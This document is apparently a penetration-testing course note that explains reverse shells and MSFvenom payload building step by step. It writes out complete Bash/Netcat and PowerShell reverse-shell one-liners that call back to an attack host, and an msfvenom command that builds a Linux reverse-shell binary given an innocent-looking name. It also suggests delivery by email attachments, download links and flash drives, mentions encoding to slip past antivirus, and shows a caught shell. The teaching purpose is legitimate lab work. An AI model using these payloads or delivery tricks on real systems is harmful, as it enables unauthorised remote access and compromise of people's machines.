# Table of Contents

- [One-Liners Examined](#one-liners-examined)
- [PowerShell One-liner Explained](#powershell-one-liner-explained)
- [Crafting Payloads with MSFvenom](#crafting-payloads-with-msfvenom)
- [Staged vs. Stageless Payloads](#staged-vs-stageless-payloads)
- [Building A Stageless Payload](#building-a-stageless-payload)
- [Executing a Stageless Payload](#executing-a-stageless-payload)
- [Building a simple Stageless Payload for a Windows system](#building-a-simple-stageless-payload-for-a-windows-system)


## One-Liners Examined

**Netcat/Bash Reverse Shell One-liner:**

```
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
```

- The commands above make up a common one-liner issued on a Linux system to serve a Bash shell on a network socket utilizing a Netcat listener.
- Let's break down each portion of the one-liner:

**Remove /tmp/f:**
```
rm -f /tmp/f; 
```
- Removes the `/tmp/f` file if it exists, `-f` causes `rm` to ignore nonexistent files. The semi-colon (`;`) is used to execute the command sequentially.

**Make A Named Pipe:**
```
mkfifo /tmp/f; 
```
- Makes a FIFO named pipe file at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (;) is used to execute the command sequentially.

**Output Redirection:**
```
cat /tmp/f | 
```
- Concatenates the FIFO named pipe file /tmp/f, the pipe (`|`) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (`|`).

**Set Shell Options:**
```
/bin/bash -i 2>&1 | 
```
- Specifies the command language interpreter using the `-i` option to ensure the shell is interactive. `2>&1` ensures the standard error data stream (`2`) & standard output data stream (`1`) are redirected to the command following the pipe (`|`).

**Open a Connection with Netcat:**
```
nc 10.10.14.12 7777 > /tmp/f  
```
- Uses Netcat to send a connection to our attack host `10.10.14.12` listening on port `7777`. The output will be redirected (>) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed

## PowerShell One-liner Explained

**Powershell One-liner:**
```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
- Let's breakdown the one-liner we used:

**Calling PowerShell**
```cmd-session
powershell -nop -c 
```
Executes `powershell.exe` with no profile (`nop`) and executes the command/script block (`-c`) in quotes. This command is issued from command-prompt. Useful for Remote Code Execution vulnerabilities allowing direct `cmd.exe` execution.

**Binding A Socket**
```cmd-session
"$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443);
```
Sets `$client` equal to `New-Object` cmdlet, creating a `System.Net.Sockets.TCPClient` .NET framework object that connects to the TCP socket `(10.10.14.158,443)`. Semi-colon (`;`) ensures sequential execution.

**Setting The Command Stream**
```cmd-session
$stream = $client.GetStream();
```
Sets `$stream` equal to the `$client` variable and GetStream .NET method for network communications.

**Empty Byte Stream**
```cmd-session
[byte[]]$bytes = 0..65535|%{0}; 
```
Creates byte array `$bytes` with 65,535 zeros - an empty byte stream directed to the TCP listener.

**Stream Parameters**
```cmd-session
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
```
Starts `while` loop with `$i` set to .NET Stream.Read method. Parameters: buffer (`$bytes`), offset (`0`), count (`$bytes.Length`).

**Set The Byte Encoding**
```cmd-session
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
```
Sets `$data` to ASCII encoding .NET class with `GetString` method to encode byte stream into ASCII text.

**Invoke-Expression**
```cmd-session
$sendback = (iex $data 2>&1 | Out-String ); 
```
Sets `$sendback` to Invoke-Expression (`iex`) against `$data`, redirecting standard error (`2>`) & output (`1`) through pipe to `Out-String`. Everything in $data runs locally.

**Show Working Directory**
```cmd-session
$sendback2 = $sendback + 'PS ' + (pwd).path + '> '; 
```
Sets `$sendback2` to `$sendback` plus 'PS' plus working directory path plus '> ', creating shell prompt "PS C:\workingdirectory >".

**Sets Sendbyte**
```cmd-session
$sendbyte= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}
```
Sets `$sendbyte` to ASCII encoded byte stream for TCP client PowerShell session with Netcat listener.

**Terminate TCP Connection**
```
$client.Close()"
```
This is the TcpClient.Close method that will be used when the connection is terminated.

The one-liner we just examined together can also be executed in the form of a PowerShell script (`.ps1`).

## Crafting Payloads with MSFvenom

Automated Metasploit attacks require network access to vulnerable targets. When direct network access isn't available, we need alternative payload delivery methods. MSFvenom allows us to craft payloads for delivery via email or social engineering tactics to trick users into executing files.

MSFvenom also provides `encryption` & `encoding` capabilities to bypass anti-virus detection signatures.

## Example with MSFvenom

```
$ msfvenom -l payloads

Framework Payloads (592 total) [--payload <value>]
==================================================

    Name                                                Description
    ----                                                -----------
linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker

...<SNIP>...

multi/meterpreter/reverse_http                      Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP
multi/meterpreter/reverse_https                     Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS
netware/shell/reverse_tcp                           Connect to the NetWare console (staged). Connect back to the attacker
nodejs/shell_bind_tcp                               Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp                            Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp_ssl                        Creates an interactive shell via nodejs, uses SSL
osx/armle/execute/bind_tcp                          Spawn a command shell (staged). Listen for a connection
osx/armle/execute/reverse_tcp                       Spawn a command shell (staged). Connect back to the attacker

...<SNIP>...

windows/dllinject/bind_hidden_tcp                   Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/dllinject/bind_ipv6_tcp                     Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)

...<SNIP>...

```

## Staged vs. Stageless Payloads

- `Staged` payloads send a small initial component that calls back to download the full payload. For example, `linux/x86/shell/reverse_tcp` sends a small stage to the target, which then downloads the remaining shellcode from the attack box to establish a reverse shell. Stages consume memory space, leaving less room for the actual payload.
- `Stageless` payloads like `linux/zarch/meterpreter_reverse_tcp` are sent completely in one transmission without stages. These work better in low-bandwidth, high-latency environments where staged payloads might create unstable sessions. Stageless payloads also improve evasion by generating less network traffic and are preferable for social engineering delivery methods.
- `Staged`: Sends payload in multiple parts (small initial stage + remainder downloaded separately)
- `Stageless`: Sends the complete payload in one transmission

## Building A Stageless Payload

```
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
```

- `msfvenom`: Call MSFvenom, Defines the tool used to make the payload.
- `-p`: This option indicates that msfvenom is creating a payload.
- `linux/x64/shell_reverse_tcp`: Choosing the Payload based on Architecture. Specifies a `Linux 64-bit` stageless payload that will initiate a TCP-based reverse shell (`shell_reverse_tcp`).
- `LHOST=10.10.14.113 LPORT=443`: Address To Connect Back To.
- `-f elf`: Format To Generate Payload In. The `-f` flag specifies the format the generated binary will be in. In this case, it will be an `.elf` file.
- `> createbackup.elf`: Output. Creates the .elf binary and names the file createbackup. We can name this file whatever we want. Ideally, we would call it something inconspicuous and/or something someone would be tempted to download and execute.

## Executing a Stageless Payload

At this point, we have the payload created on our attack box. We would now need to develop a way to get that payload onto the target system. There are countless ways this can be done. Here are just some of the common ways:
- Email message with the file attached.
- Download link on a website.
- Combined with a Metasploit exploit module (this would likely require us to already be on the internal network).
- Via flash drive as part of an onsite penetration test.
Once the file is on that system, it will also need to be executed.

We would have a listener ready to catch the connection on the attack box side upon successful execution.

**NC Connection:** `$ sudo nc -lvnp 443`

When the file is executed, we see that we have caught a shell.

**Connection Established:**

```
$ sudo nc -lvnp 443

Listening on 0.0.0.0 443
Connection received on 10.129.138.85 60892
env
PWD=/home/htb-student/Downloads
cd ..
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
```

## Building a simple Stageless Payload for a Windows system

- This is another situation where we need to be creative in getting this payload delivered to a target system. Without any `encoding` or `encryption`, the payload in this form would almost certainly be detected by Windows Defender AV.
- If the AV was disabled all the user would need to do is double click on the file to execute and we would have a shell session.

































